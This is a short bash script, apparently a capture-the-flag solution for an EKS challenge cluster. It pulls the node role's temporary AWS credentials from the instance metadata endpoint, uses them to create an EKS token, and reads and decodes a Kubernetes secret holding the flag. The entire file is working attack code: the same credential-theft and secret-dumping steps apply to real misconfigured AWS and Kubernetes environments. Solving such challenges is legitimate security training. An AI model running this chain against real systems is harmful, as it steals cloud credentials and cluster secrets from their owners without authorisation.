#!/bin/bash

# Grabbing the creds for the eks node role
export ROLE=$(curl http://169.254.169.254/latest/meta-data/iam/security-credentials/)
export JSON=$(curl http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE)
export AWS_ACCESS_KEY_ID=$(echo $JSON | jq -r '.AccessKeyId' )
export AWS_SECRET_ACCESS_KEY=$(echo $JSON | jq -r '.SecretAccessKey' )
export AWS_SESSION_TOKEN=$(echo $JSON | jq -r '.SessionToken' )

# Creating a token via eks and the role
export EKS_TOKEN=$(aws eks get-token --cluster-name=eks-challenge-cluster | jq -r '.status.token')

# Hack to get the flag from the image layer
kubectl --token=$EKS_TOKEN get secrets -o json | jq -r '.items[0].data.flag' | base64 -d